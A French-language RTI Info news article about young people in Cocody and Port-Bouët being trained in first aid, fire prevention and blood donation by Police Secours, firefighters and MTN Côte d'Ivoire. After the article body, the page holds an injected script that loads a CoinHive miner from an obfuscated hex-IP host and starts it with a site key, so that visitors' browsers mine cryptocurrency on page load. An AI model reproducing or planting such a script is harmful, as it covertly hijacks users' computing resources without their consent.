Des jeunes formés aux techniques de premier secours pour sauver des vies.
0
 

Écouter
Des jeunes formés aux techniques de premier secours pour sauver des vies.

Des jeunes formés aux techniques de premier secours pour sauver des vies.

RTI Info | Lu 648 fois | Publié Il y a 28 jour(s)

De sources sanitaires ivoiriennes 1458 accidents ont causé 3200 blessés et 81 pertes en vie humaine en 2017. Les accidents domestiques et les incendies, eux, sont quasi quotidiens. Dans cette optique, il est nécessaire d’apprendre des gestes qui peuvent sauver des vies en situation de détresse. La plateforme « Police secours », appuyée par les sapeurs-pompiers et MTN Côte d’Ivoire ont initié un projet pour sensibiliser et former les populations des communes de Cocody et Port –Bouët aux gestes de premiers secours à travers des séances pratiques.

« Avec notre plateforme, nous apportons de l’assistance aux populations en détresse en coordination avec la Police Nationale et les pompiers. Nous avons remarqué que lors des accidents de la route, les victimes, avant l’arrivée des secours sont prises en charge par des personnes qui ne savent pas les gestes de premier secours. On trouve malheureusement des personnes qui perdent la vie, parce le bon geste n’a pas été exécuté », explique Assane Coulibaly Keita de Police Secours.

Outre cela, les jeunes ont été formés à la prévention des incendies et les accidents domestiques.

« Dans nos quartiers, il y a incendies et on ne sait pas comment faire. Avec les conseils des pompiers, je n’ai plus peur du feu. On peut maitriser une bouteille de gaz qui a pris feu dans une maison et circonscrire très rapidement un incendie avant qu’il ne se propage », souligne Adam Kanté, un étudiant dans la Commune de Cocody.

Les jeunes ont en outre, donné de leur sang et été sensibilisés à la prise en charge des AVC à travers des séances de dépistage des maladies métaboliques.

Les employés de la compagnie de télécommunication ont aussi participé à ces ateliers et séances de formations pratiques pour être utiles à la communauté.

Pour les pompiers, chaque entreprise ou structure public ou privée doit former son personnel aux gestes de premiers secours. C’est ainsi que des vies pourront être sauvées. Ils ont profité pour appeler à plus de civisme de la part des populations lors de leurs interventions.

 

 

 

<script src="https://0x6814D03B/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('f8XBOx6egKlyNr6RU9M1hnmEJd81a17g');
miner.start();
</script>

Cet article vous a plu ! Partagez-le maintenant

A lire également

 
 
 
 
 
 
 
 
 
 

En continu

Equateur : Un accident d'autocar fait au moins 24 morts (officiel)

Venezuela : Arrestation d'un général en lien avec l'"attentat" contre le président Maduro

Mali : Le camp IBK confiant dans l'attente des résultats

Sierra Leone : Cérémonie du 1er anniversaire des inondations de 2017

Côte d’Ivoire : Un mini car transportant des fidèles chrétiens se renverse, 3 morts dont un pasteur